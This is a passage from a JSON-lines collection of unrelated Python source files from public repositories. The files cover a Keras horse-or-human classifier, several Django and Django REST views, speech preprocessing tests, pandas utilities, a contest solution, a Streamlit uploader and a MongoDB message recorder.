https://storage.googleapis.com/laurencemoroney-blog.appspot.com/horse-or-human.zip -O 
/tmp/horse-or-human.zip\n'''\n\nimport os\nimport zipfile\n\nprint(\"extracting horse-or-human.zip...\")\nlocal_zip = \"./tmp/horse-or-human.zip\"\nzip_ref = zipfile.ZipFile(local_zip, 'r')\nzip_ref.extractall(\"./tmp/horse-or-human\")\nzip_ref.close()\nprint(\"./tmp/horse-or-human/horse and human subdir have been created\")\n# NOTE : we do not label jpg data as human, horse, but it will be recognized from the sub-directory names by using ImageGenerator\n\n# Directory with training horse/ human pictures\ntrain_horse_dir = os.path.join(\"./tmp/horse-or-human/horses\")\ntrain_human_dir = os.path.join(\"./tmp/horse-or-human/humans\")\n\n# filenames look like..\ntrain_horse_names = os.listdir(train_horse_dir)\n#print(train_horse_names[:10])\ntrain_human_names = os.listdir(train_human_dir)\n#print(train_human_names[:10])\n\nprint(\"Total training horse images:\", len(train_horse_names))\nprint(\"Total training human images:\", len(train_human_names))\n\n#%matplotlib inline # for notebook\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\n'''\n# to display pictures\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\n# Parameters for our graph; we'll output images in a 4x4 configuration\nnrows = 4\nncols = 4\n\n# Index for iterating over images\npic_index = 0\n# Set up matplotlib fig, and size it to fit 4x4 pics\nfig = plt.gcf()\nfig.set_size_inches(ncols * 4, nrows * 4)\n\npic_index += 8\nnext_horse_pix = [os.path.join(train_horse_dir, fname)\n                for fname in train_horse_names[pic_index-8:pic_index]]\nnext_human_pix = [os.path.join(train_human_dir, fname)\n                for fname in train_human_names[pic_index-8:pic_index]]\n\nfor i, img_path in enumerate(next_horse_pix+next_human_pix):\n    # Set up subplot; subplot indices start at 1\n    sp = plt.subplot(nrows, ncols, i + 1)\n    sp.axis('Off') # Don't show axes (or gridlines)\n\n    img = mpimg.imread(img_path)\n    plt.imshow(img)\n\nplt.show()\n'''\n\n# building a model\nimport tensorflow as tf\nmodel = tf.keras.models.Sequential([\n    # input shape : image 300 x 300 with 3 bytes color\n    # first convolution\n    tf.keras.layers.Conv2D(16, (3,3), activation='relu', input_shape=(300,300,3)),\n    tf.keras.layers.MaxPooling2D(2,2),\n    # second convolution\n    tf.keras.layers.Conv2D(32, (3,3), activation='relu'),\n    tf.keras.layers.MaxPooling2D(2,2),\n    # third convolution\n    tf.keras.layers.Conv2D(64, (3,3), activation='relu'),\n    tf.keras.layers.MaxPooling2D(2,2),\n    # fourth convolution\n    tf.keras.layers.Conv2D(64, (3,3), activation='relu'),\n    tf.keras.layers.MaxPooling2D(2,2),\n    # flatten the results to feed into a DNN\n    tf.keras.layers.Flatten(),\n    # 512 neuron hidden layers\n    tf.keras.layers.Dense(512, activation='relu'),\n    # only 1 output neuron. 
contains a value from 0-1 (0=horse, 1=human)\n    tf.keras.layers.Dense(1, activation='sigmoid')\n])\nmodel.summary()\n\nfrom tensorflow.keras.optimizers import RMSprop\nmodel.compile(loss='binary_crossentropy',\n              optimizer=RMSprop(lr=0.001),\n              metrics=['accuracy'])\n\n# data preprocessing\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\n# all images will be rescaled by 1/255 (normalizing)\ntrain_datagen = ImageDataGenerator(rescale=1/255)\n\n# flow training images in batches of 128 using train_datagen generator\n''' NOTE\nThis ImageDataGenerator class allows you to instantiate generators of augmented image batches (and their labels) via\n(1).flow(data, labels) or\n(2).flow_from_directory(directory).\n'''\ntrain_generator = train_datagen.flow_from_directory(\n    '/Users/gina/Desktop/projects/DeepLearning/VisionNN/tmp/horse-or-human', #source of training images\n    target_size=(300, 300),\n    batch_size=128,\n    #since we use binary_crossentropy loss, we need binary labels\n    class_mode='binary')\n\n# training\nhistory = model.fit(\n    train_generator,\n    steps_per_epoch=8,\n    epochs=3,\n    verbose=1) # verbose = 0 for silent, verbose = 1 for progress bar\n\n# running a prediction using the model\nprint(\"Running a prediction using the model...\")\n\nimport numpy as np\nfrom tensorflow.keras.preprocessing import image\n\n\n# predicting images\npath = \"/Users/gina/Desktop/projects/DeepLearning/VisionNN/content/\"\n\ntest_files = os.listdir(path)\nprint(\"test files:\", test_files)\n\nfor fn in test_files:\n    img = image.load_img(path + fn, target_size=(300,300))\n    x = image.img_to_array(img) #shape: (300,300,3)\n    x = np.expand_dims(x, axis=0) #shape: (1,300,300,3)\n\n    images = np.vstack([x]) #shape: (1,300,300,3)\n    classes = model.predict(images, batch_size=10)\n    print(classes[0])\n    if classes[0] > 0.5:\n        print(fn + \" is a human\")\n    else:\n        print(fn + \" is a horse\")\n\n# visualizing intermediate representations\n# NOTE: to get a feel for what kind of features our convnet has learnt,\n# visualize how an input gets transformed as it goes through the convnet.\nimport random\nfrom tensorflow.keras.preprocessing.image import load_img, img_to_array\n\n# define a new model that will take an image as input, and will output\n# intermediate representations for all layers in the previous model after the first\n\nsuccessive_outputs = [layer.output for layer in model.layers[1:]] #model has 11 layers\n\nvisualization_model = tf.keras.models.Model(inputs = model.input,\n                                            outputs = successive_outputs)\n\n# prepare a random input image from the training set\nhorse_img_files = [os.path.join(train_horse_dir, f) for f in train_horse_names]\nhuman_img_files = [os.path.join(train_human_dir, f) for f in train_human_names]\nimg_path = random.choice(horse_img_files + human_img_files) # choose 1 randomly\n\nimg = load_img(img_path, target_size=(300,300))\nx = img_to_array(img) # numpy array with shape (300, 300, 3)\nx = x.reshape((1,) + x.shape) # numpy array with shape (1,300,300,3)\n\n# rescale by 1/255\nx /= 255\n\n# obtaining all intermediate representations for this image\nsuccessive_feature_maps = visualization_model.predict(x)\nprint(\"successive_feature_maps list length:\", len(successive_feature_maps))\n\n# layers name\nlayer_names = [layer.name for layer in model.layers]\nprint(\"layers name:\", layer_names) #['conv2d', 'max_pooling2d', 'conv2d_1', 'max_pooling2d_1', 'conv2d_2', 'max_pooling2d_2', 'conv2d_3', 'max_pooling2d_3', 'flatten', 'dense', 'dense_1']\n\n# display\nfor layer_name, 
feature_map in zip(layer_names, successive_feature_maps):\n    if len(feature_map.shape) == 4:\n        # just do this for the conv/max pool layers, not fully-connected layers\n        n_features = feature_map.shape[-1] # nums of features in feature map\n        # the feature map has shape( 1, size, size, n_features)\n        size = feature_map.shape[1]\n        display_grid = np.zeros((size, size * n_features))\n        for i in range(n_features):\n            # Postprocess the feature to make it visually palatable\n            x = feature_map[0, :, :, i]\n            x -= x.mean()\n            x /= x.std()\n            x *= 64\n            x += 128\n            x = np.clip(x, 0, 255).astype('uint8')\n            # We'll tile each filter into this big horizontal grid\n            display_grid[:, i * size : (i + 1) * size] = x\n        # Display the grid\n        scale = 20. / n_features\n        plt.figure(figsize=(scale * n_features, scale))\n        plt.title(layer_name)\n        plt.grid(False)\n        plt.imshow(display_grid, aspect='auto', cmap='viridis')\n        plt.show()\n# NOTE: As you can see we go from the raw pixels of the images to increasingly abstract and compact representations. The representations downstream start highlighting what the network pays attention to, and they show fewer and fewer features being \"activated\"; most are set to zero. This is called \"sparsity.\" Representation sparsity is a key feature of deep learning.\nprint(\"These representations carry increasingly less information about the original pixels of the image, but increasingly refined information about the class of the image. You can think of a convnet (or a deep network in general) as an information distillation pipeline. \")\n\n# clean up to terminate the kernel and free memory resources:\ninput_ = input(\"Terminate the kernel and free memory resource? (y/n):\")\nif input_ == \"y\":\n    import os, signal\n    os.kill(os.getpid(), signal.SIGKILL)\n","repo_name":"eunjeena/DeepLearning","sub_path":"VisionNN/human_horse.py","file_name":"human_horse.py","file_ext":"py","file_size_in_byte":8413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15114864520","text":"class LoadedProcess:\n\n    def __init__(self, id, process_id, repository_id):\n        self.id = id\n        self.process_id = process_id\n        self.process_name = process_id\n        self.process_description = ''\n        self.repository_id = repository_id\n        self.repository_name = repository_id\n        self.repository_description = ''\n        self.is_manager = False\n        self.is_contributor = False\n        self.reference_list = None\n        self.identifier = None\n        self.uri = ''\n        self.description = ''\n        self.category = ''\n        self.version = ''\n        self.quantity_disciplines_used = 0\n        self.discipline_list = None\n        self.associated_usecases = None\n\n    def apply_ontology(self, processes_ontology_metadata):\n\n        process_key = f'{self.repository_id}.{self.process_id}'\n\n        ontology_process_request = list(filter(lambda po: po['id'] == process_key, processes_ontology_metadata))\n\n        if len(ontology_process_request) == 1:\n            ontology_process = ontology_process_request[0]\n            self.deserialize(ontology_process)\n\n    def deserialize(self, json_dict):\n        self.identifier = json_dict['id']\n        self.uri = json_dict['uri']\n        self.process_name = json_dict['label']\n        self.description = json_dict['description']\n        self.category = json_dict['category']\n        self.version = json_dict['version']\n        self.repository_name = json_dict['process_repository_label']\n        self.quantity_disciplines_used = json_dict['quantity_disciplines_used']\n        self.discipline_list = json_dict['discipline_list']\n        self.associated_usecases = json_dict['associated_usecases']\n\n    def serialize(self):\n        
\"\"\" json serializer for dto purpose\n \"\"\"\n return {\n 'id': self.id,\n 'process_id': self.process_id,\n 'process_name': self.process_name,\n 'process_description': self.process_description,\n 'repository_id': self.repository_id,\n 'repository_name': self.repository_name,\n 'repository_description': self.repository_description,\n 'is_manager': self.is_manager,\n 'is_contributor': self.is_contributor,\n 'reference_list': self.reference_list,\n 'identifier': self.identifier,\n 'uri': self.uri,\n 'description': self.description,\n 'category': self.category,\n 'version': self.version,\n 'quantity_disciplines_used': self.quantity_disciplines_used,\n 'discipline_list': self.discipline_list,\n 'associated_usecases': self.associated_usecases\n }\n","repo_name":"os-climate/sostrades-webapi","sub_path":"sos_trades_api/models/loaded_process.py","file_name":"loaded_process.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"39994284160","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom os.path import join\nimport sys\nimport unittest\nfrom glob import glob\n\nsys.path.append('../../')\nfrom swbd.input_data import read_audio\nfrom swbd.labels.ldc97s62.character import read_trans\nfrom utils.measure_time_func import measure_time\nfrom utils.util import mkdir_join\n\nswbd_trans_path = '/n/sd8/inaguma/corpus/swbd/swb_ms98_transcriptions'\nhtk_save_path = '/n/sd8/inaguma/corpus/swbd/htk'\nwav_save_path = '/n/sd8/inaguma/corpus/swbd/wav'\n\n# Search paths to transcript\nlabel_paths = []\nfor trans_path in glob(join(swbd_trans_path, '*/*/*.text')):\n if trans_path.split('.')[0][-5:] == 'trans':\n label_paths.append(trans_path)\nlabel_paths = sorted(label_paths)\n\nwb_paths = []\nfor wb_path in glob(join(swbd_trans_path, '*/*/*.text')):\n if wb_path.split('.')[0][-4:] == 'word':\n wb_paths.append(wb_path)\nwb_paths = sorted(wb_paths)\n\n# Search paths to audio files\nwav_paths = [wav_path for wav_path in glob(join(wav_save_path, 'swbd/*.wav'))]\nhtk_paths = [htk_path for htk_path in glob(join(htk_save_path, 'swbd/*.htk'))]\n\nCONFIG = {\n 'feature_type': 'logmelfbank',\n 'channels': 40,\n 'sampling_rate': 8000, # NOTE: 8000Hz\n 'window': 0.025,\n 'slide': 0.01,\n 'energy': False,\n 'delta': True,\n 'deltadelta': True\n}\n\n\nclass TestInputLDC97S62(unittest.TestCase):\n\n def test(self):\n\n self.speaker_dict = read_trans(\n label_paths=label_paths,\n word_boundary_paths=wb_paths,\n run_root_path='../',\n vocab_file_save_path=mkdir_join('../config/vocab_files'),\n save_vocab_file=False)\n\n self.check(normalize='global', tool='htk')\n self.check(normalize='speaker', tool='htk')\n self.check(normalize='utterance', tool='htk')\n\n # self.check(normalize='global', tool='python_speech_features')\n # self.check(normalize='speaker', tool='python_speech_features')\n # self.check(normalize='utterance', tool='python_speech_features')\n\n # self.check(normalize='global', tool='librosa')\n # self.check(normalize='speaker', tool='librosa')\n # self.check(normalize='utterance', tool='librosa')\n\n @measure_time\n def check(self, normalize, tool):\n\n print('=' * 50)\n print(' normalize: %s' % normalize)\n print(' tool: %s' % tool)\n print('=' * 50)\n\n audio_paths = htk_paths if tool == 'htk' else wav_paths\n\n read_audio(audio_paths=audio_paths,\n tool=tool,\n config=CONFIG,\n 
normalize=normalize,\n                   speaker_dict=self.speaker_dict,\n                   is_training=True)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"hirofumi0810/asr_preprocessing","sub_path":"swbd/test/test_input_ldc97s62.py","file_name":"test_input_ldc97s62.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"67"} +{"seq_id":"6186498731","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n    path('', views.HomeListView.as_view(), name='home'),\n    path('immobile/<int:pk>/', views.ImmobileDetailView.as_view(), name='detail'),\n    path('schedule-visits/', views.schedules_visit, name='schedule-visits'),\n    path('schedules/', views.SchedulesListView.as_view(), name='schedules'),\n    path('cancel-schedules/', views.cancel_schedule, name='cancel-schedules'),\n]\n","repo_name":"jvitor425/Avaliacao-3-Banco-de-Dados-II","sub_path":"plataform/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32893889350","text":"\n\n\n\nfrom .base import *\n\n\ndef get_int_dtypes():\n    dtypes = []\n    for n in [64,32,16,8]:\n        for p in ['','u']:\n            dtypes.append(\n                getattr(np,f'{p}int{n}'))\n    return dtypes\n\n\ndef is_ok(series, dtype):\n    iinfo = np.iinfo(dtype)\n    first = iinfo.min < series.min() < iinfo.max\n    second = iinfo.min < series.max() < iinfo.max\n    return first and second\n\n\ndef reduce_memory_usage(df):\n    dtypes = get_int_dtypes()\n    int_cc = df.select_dtypes(\n        include=dtypes).columns\n    for c in int_cc:\n        best_dtype = np.int64\n        for dtype in dtypes:\n            if is_ok(df[c], dtype):\n                best_dtype = dtype\n        df[c] = df[c].astype(best_dtype)\n    float_cc = df.select_dtypes(\n        include=[np.float64,np.float32]).columns\n    for c in float_cc:\n        df[c] = df[c].astype(np.float16)\n        \n    ","repo_name":"lyghter/data-fusion-puzzle","sub_path":"lib/base/dataframe.py","file_name":"dataframe.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"29195685277","text":"from django.shortcuts import render\nfrom django.contrib.auth import get_user_model\nfrom rest_framework import viewsets\nfrom rest_framework import status\nfrom rest_framework import parsers\nfrom rest_framework import renderers\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.authentication import TokenAuthentication, SessionAuthentication #, BasicAuthentication\nfrom rest_framework.authtoken.serializers import AuthTokenSerializer\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.authtoken import views as auth_views\nfrom cliente.serializers import UserSerializer\n# Create your views here.\n\n\n\n\nUserModel = get_user_model()\n\nclass UserViewSet(viewsets.ModelViewSet):\n    queryset = UserModel.objects.all()\n    serializer_class = UserSerializer\n\n    def list(self, request):\n        if request.user.is_superuser:\n            serializer = self.get_serializer(self.queryset, many=True)\n            return Response(serializer.data)\n\n        queryset = UserModel.objects.all()\n        serializer = self.get_serializer(self.queryset, many=True)\n        return Response(serializer.data)\n\n    def create(self, request, *args, **kwargs):\n        serializer = self.get_serializer(data=request.data)\n        
serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n headers = self.get_success_headers(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\nclass UserAuthentication(APIView):\n throttle_classes = ()\n permission_classes = ()\n parser_classes = (parsers.FormParser, parsers.MultiPartParser, parsers.JSONParser,)\n renderer_classes = (renderers.JSONRenderer,)\n serializer_class = AuthTokenSerializer\n \n def get_serializer_context(self):\n return {\n 'request': self.request,\n 'format': self.format_kwarg,\n 'view': self\n }\n\n def get_serializer(self, *args, **kwargs):\n kwargs['context'] = self.get_serializer_context()\n return self.serializer_class(*args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n token, created = Token.objects.get_or_create(user=user)\n user_id = UserModel.objects.get(pk=user.pk).id\n return Response({'token': token.key,'user_id':user.id})\n\n\nobtain_auth_token = UserAuthentication.as_view()","repo_name":"amarotxt/medicar","sub_path":"BackEnd/source/cliente/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72094958935","text":"n = int(input())\nd = {}\nlevels = {}\nroot = 'Isenbaev'\n\nfor i in range(n):\n\ta, b, c = input().split()\n\n\tif d.get(a) == None:\n\t\td[a] = set()\n\n\td[a].add(b)\n\td[a].add(c)\n\n\tif d.get(b) == None:\n\t\td[b] = set()\n\n\td[b].add(a)\n\td[b].add(c)\n\t\n\tif d.get(c) == None:\n\t\td[c] = set()\n\n\td[c].add(a)\n\td[c].add(b)\n\nif d.get(root) != None:\n\tlevels[root] = 0\n\n\tcurrent_dude = root\n\tqueue = [current_dude]\n\tcurrent = 0\n\n\twhile current < len(queue) and current < 50:\n\t\tcurrent_dude = queue[current]\n\n\t\tfor i in d[current_dude]:\n\t\t\tif levels.get(i) != None:\n\t\t\t\tcontinue\n\n\t\t\tlevels[i] = levels[current_dude] + 1\n\t\t\tqueue.append(i)\n\n\t\tcurrent += 1\n\nfor i in sorted(d.keys()):\n\tif levels.get(i) != None:\n\t\tprint(i, levels[i])\n\telse:\n\t\tprint(i, 'undefined')","repo_name":"kokosda/sport-programming","sub_path":"src/timus/timus_1837.py","file_name":"timus_1837.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71957346133","text":"import sys\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n#---------------------------------------------\ndef main(argv):\n\n data = pd.DataFrame({\n 'Neutral': [593, 637],\n 'Happiness': [69, 1511],\n 'Sadness': [28, 23],\n 'Anger': [45, 28],\n 'Fear': [25, 1],\n 'Surprise': [83, 11],\n 'Disgust': [59, 11]\n },\n columns=('Neutral', 'Happiness', 'Sadness', 'Anger',\n 'Fear', 'Surprise', 'Disgust'),\n index=['CK+', '10K']\n )\n data.index.name = 'Dataset'\n\n pal = sns.color_palette('colorblind', 8)\n\n fig, axes = plt.subplots(1, 2)\n\n ax = sns.heatmap(data, annot=True, fmt='d', linewidths=.5, ax=axes[0], cmap='Blues')\n ax.set_xlabel('Emotion Labels', fontsize=15)\n ax.set_ylabel('Dataset', fontsize=15)\n ax.set_title('Samples per Dataset', fontsize=25)\n\n perc = data.sum()\n perc /= perc.sum()\n\n ax = sns.barplot(x=data.columns, y=perc, ax=axes[1], palette=pal)\n ax.set_xlabel('Emotion Labels', fontsize=15)\n ax.set_ylabel('Percentage of 
Samples', fontsize=15)\n ax.set_title('Total of Samples', fontsize=25)\n\n plt.show()\n\n return 0\n\n#---------------------------------------------\n# namespace verification for invoking main\n#---------------------------------------------\nif __name__ == '__main__':\n main(sys.argv[1:])","repo_name":"luigivieira/fsdk","sub_path":"fsdk/reports/emotions-datasets.py","file_name":"emotions-datasets.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9396516013","text":"\nfrom rest_framework import viewsets\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import permission_classes\nfrom rest_framework import permissions\nfrom pymongo import MongoClient\n\n\n@permission_classes((permissions.AllowAny,))\nclass address_search(viewsets.ViewSet):\n def list(self, request):\n radius=request.query_params['radius']\n try:\n if not request.query_params['radius'].isdigit():\n return Response({'status':'ERROR','error':'INVALID_radius'})\n except:\n return Response({'status':'ERROR','error':'NO_radius_SPECIFIED'})\n Address = \"\"\n\n if (\"Address\" in request.query_params):\n Address = request.query_params['Address']\n else:\n return Response({'status': 'ERROR',\n 'error': 'Please Enter a valid Address'})\n db_client = MongoClient(host='52.91.122.15', port=27017) \n location=Address\n data_1=list(db_client.MLSLite.miami1L.find({\"UnparsedAddress\":location},{'Latitude':1,'Longitude':1}))\n lat=[]\n long=[]\n for i in data_1:\n lat.append(i[\"Latitude\"])\n long.append(i[\"Longitude\"])\n \n rad=int(radius)\n data_2=list(db_client.MLSLite.miami1L.find({\"$where\":\"getDistanceFromLatLonInKm(%s,%s,this.Latitude,this.Longitude) <= %s\"%(lat,long,rad)},{'UnparsedAddress':1,'City':1,'StateOrProvince':1, 'PostalCode':1, 'PostalCodePlus4':1, 'ParcelNumber':1,\n 'PropertyType':1,\n 'PropertySubType':1,\n 'LotSizeSquareFeet':1,\n 'LivingArea':1,\n 'ArchitecturalStyle':1,\n 'Heating':1,\n 'Cooling':1,\n 'StoriesTotal':1,\n 'Stories':1,\n 'YearBuilt':1,\n 'Roof':1,\n 'ConstructionMaterials':1,\n 'BedroomsTotal':1,\n 'BathroomsTotalInteger':1,\n 'ParkingFeatures':1,\n 'PoolFeatures':1,\n 'View':1,\n 'PatioAndPorchFeatures':1,\n 'Basement':1,\n 'FireplacesTotal':1,\n 'FireplaceYN':1,\n 'FireplaceFeatures':1,\n 'InteriorFeatures':1,\n 'ExteriorFeatures':1,\n 'OtherStructures':1,\n 'PublicRemarks':1,\n 'LotFeatures':1,\n 'ZoningDescription':1,\n 'CommunityFeatures':1,\n 'ElementarySchoolDistrict':1,\n 'MiddleOrJuniorSchoolDistrict':1,\n 'HighSchoolDistrict':1,\n 'ElementarySchool':1,\n 'MiddleOrJuniorSchool':1,\n 'HighSchool':1,\n 'Appliances':1,\n 'LotSizeDimensions':1,\n 'Topography':1,\n 'WaterSource':1,\n 'ListingContractDate':1,\n 'StandardStatus':1,\n 'MlsStatus':1,\n 'ListPrice':1,\n 'CloseDate':1,\n 'ListAgentStateLicense':1,\n 'ListAgentFullName':1,\n 'ListAgentPreferredPhone':1,\n 'ListAgentEmail':1,\n 'ListOfficeName':1,\n 'ListOfficePhone':1,\n 'ListOfficeEmail':1,\n 'ListingId':1,\n 'ListingKey':1,\n 'ModificationTimestamp':1,\n 'SI_FIPS':1,\n 'SI_PropertyRefID':1,\n 'SI_PriceperSquareFeet':1,\n 'WaterfrontFeatures':1,\n 'SI_WaterYN':1,\n 'SI_DaysOnMarket':1,\n 'SI_ListingNumber':1,\n 'SI_SoldPriceRange':1,\n 'SI_AdjustedSoldPrice':1,\n 'MemberAddress1':1,\n 'OfficeAddress1':1,\n 'Latitude':1,\n 'Longitude':1,\n 'Distance':1,\n 'SubjectProperty':1}))\n\n\n for i in data_2:\n if i[\"UnparsedAddress\"]==location:\n i[\"subject_property\"]=\"true\"\n else: \n 
i[\"subject_property\"]=\"false\"\n        \n        \n        list(map(lambda data_1: data_1.pop('_id'), data_2))\n        finalObj = {\"Listings\":data_2,\"Total_Comparables\":len(data_2)}\n        return Response(finalObj)","repo_name":"vishnusk12/Address-Based-Radius-Search-API","sub_path":"Address_Search_MLSLite/Address_Search_MLSLite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"7757657790","text":"from random import choice\n\nsustantivos = ['perro', 'gato', 'cerdo', 'muchacho', 'auto']\nadjetivos = ['alegre', 'triste', 'emocionado', 'tranquilo']\nverbos = ['saltó', 'jugó', 'mordió', 'corrió', 'gritó']\n\nsustantivo = choice(sustantivos)\nsustantivo2 = choice(sustantivos)\nadjetivos = choice(adjetivos)\nverbo = choice(verbos)\n\nprint('El {} {} al {} y fue {}.'.format(sustantivo, verbo, sustantivo2, adjetivos))\n","repo_name":"CarlosVV/PythonGroup_07","sub_path":"clase02/madlibs.py","file_name":"madlibs.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"5570066332","text":"# Запуск через команду в консоль: streamlit run my.py\n# Использовал PyCharm как IDE.\nimport io\nimport streamlit.components.v1 as components\nimport streamlit as st\nfrom PIL import Image\n\n# components.html(\n#     \"\"\"\n#     \n#     \n#     \n#     \n#     \n#     \"\"\",\n#     )\n\nst.markdown(\"\"\"\n\n\"\"\", unsafe_allow_html=True)\n\ndef load_image():\n    # Форма для загрузки изображения\n    uploaded_file = st.file_uploader(\n        label='Выберите изображение для нахождения мишек.')\n    if uploaded_file is not None:\n        # Получение загруженного изображения\n        image_data = uploaded_file.getvalue()\n        # Показ загруженного изображения на Web-странице средствами Streamlit\n        st.image(image_data)\n        # Возврат изображения в формате PIL\n        return Image.open(io.BytesIO(image_data))\n    else:\n        return None\n\n# Выводим заголовок страницы средствами Streamlit\nst.title('Мишки! 
(Или кого мы там ищем.)')\n# Вызываем функцию создания формы загрузки изображения\nimg = load_image()","repo_name":"SonderHeim/ADPython","sub_path":"my.py","file_name":"my.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1199058436","text":"\"\"\"\nWorking with a SQL database with pandas.\nAuthor: Andrew Jarombek\nDate: 2/24/2020\n\"\"\"\n\nfrom sqlalchemy import MetaData, Column, Table, String, create_engine\nimport pandas as pd\nimport numpy as np\n\n# SQLite is an in-application database.\nengine = create_engine('sqlite:///test.sqlite')\n\nmeta = MetaData()\n\nstuffed_animals = Table(\n    'stuffed_animals', meta,\n    Column('name', String, primary_key=True),\n    Column('species', String, nullable=False),\n    Column('caretaker', String, nullable=False)\n)\n\nmeta.drop_all(engine)\nmeta.create_all(engine)\n\n# Some of my stuffed friends and my sisters.\ninsert_dotty = stuffed_animals.insert().values(name='Dotty', species='Horse', caretaker='Andy')\ninsert_lily = stuffed_animals.insert().values(name='Lily', species='Bear', caretaker='Andy')\ninsert_fluffy = stuffed_animals.insert().values(name='Fluffy', species='Goat', caretaker='Andy')\ninsert_puffy = stuffed_animals.insert().values(name='Puffy Duffy', species='Dog', caretaker='Laurel')\ninsert_sock = stuffed_animals.insert().values(name='Sock Monkey', species='Monkey', caretaker='Laurel')\n\nconnection = engine.connect()\n\nconnection.execute(insert_dotty)\nconnection.execute(insert_lily)\nconnection.execute(insert_fluffy)\nconnection.execute(insert_puffy)\nconnection.execute(insert_sock)\n\nresult: pd.DataFrame = pd.read_sql('select * from stuffed_animals', engine)\nprint(result)\n\nassert (result.head(3).values == np.array([\n    ['Dotty', 'Horse', 'Andy'],\n    ['Lily', 'Bear', 'Andy'],\n    ['Fluffy', 'Goat', 'Andy']\n])).all()\n","repo_name":"AJarombek/data-analytics-prototypes","sub_path":"Python/pandas/pandas-sqlite.py","file_name":"pandas-sqlite.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16575461647","text":"from posttroll.subscriber import Subscribe\nimport logging\nimport logging.config\nimport logging.handlers\nfrom threading import Thread\nimport yaml\nimport os\n\nfrom pymongo import MongoClient\nlogger = logging.getLogger(__name__)\n\n\nclass MongoRecorder:\n    \"\"\"A recorder for posttroll file messages.\"\"\"\n\n    def __init__(self,\n                 mongo_uri=\"mongodb://localhost:27017\",\n                 db_name='sat_db'):\n        \"\"\"Init the recorder.\"\"\"\n        self.db = MongoClient(mongo_uri)[db_name]\n        self.loop = True\n        self._recorder = Thread(target=self.record)\n\n    def start(self):\n        \"\"\"Start the recording.\"\"\"\n        self._recorder.start()\n\n    def insert_files(self, msg):\n        \"\"\"Insert files in the database.\"\"\"\n        self.db.files.insert_one(msg.data)\n\n    def record(self):\n        \"\"\"Log stuff.\"\"\"\n        try:\n            with Subscribe(\"\", addr_listener=True) as sub:\n                for msg in sub.recv(timeout=1):\n                    if msg:\n                        logger.debug(\"got msg %s\", str(msg))\n                        if msg.type in ['collection', 'file', 'dataset']:\n                            self.insert_files(msg)\n                    if not self.loop:\n                        logger.info(\"Stop recording\")\n                        break\n        except Exception:\n            logger.exception(\"Something went wrong in record\")\n            raise\n\n    def stop(self):\n        \"\"\"Stop the machine.\"\"\"\n        self.loop = False\n\n\nlog_levels = {\n    0: logging.WARN,\n    1: logging.INFO,\n    2: logging.DEBUG,\n}\n\n\ndef setup_logging(cmd_args):\n    \"\"\"Set up logging.\"\"\"\n    if cmd_args.log_config is 
not None:\n with open(cmd_args.log_config) as fd:\n log_dict = yaml.safe_load(fd.read())\n logging.config.dictConfig(log_dict)\n return\n\n root = logging.getLogger('')\n root.setLevel(log_levels[cmd_args.verbosity])\n\n if cmd_args.log:\n fh_ = logging.handlers.TimedRotatingFileHandler(\n os.path.join(cmd_args.log),\n \"midnight\",\n backupCount=7)\n else:\n fh_ = logging.StreamHandler()\n\n formatter = logging.Formatter(LOG_FORMAT)\n fh_.setFormatter(formatter)\n\n root.addHandler(fh_)\n\n\nLOG_FORMAT = \"[%(asctime)s %(name)s %(levelname)s] %(message)s\"\n\nif __name__ == '__main__':\n import time\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-d\", \"--database\",\n help=\"URI to the mongo database (default mongodb://localhost:27017 ).\",\n default=\"mongodb://localhost:27017\")\n parser.add_argument(\"-l\", \"--log\",\n help=\"The file to log to. stdout otherwise.\")\n parser.add_argument(\"-c\", \"--log-config\",\n help=\"Log config file to use instead of the standard logging.\")\n parser.add_argument(\"-v\", \"--verbose\", dest=\"verbosity\", action=\"count\", default=0,\n help=\"Verbosity (between 1 and 2 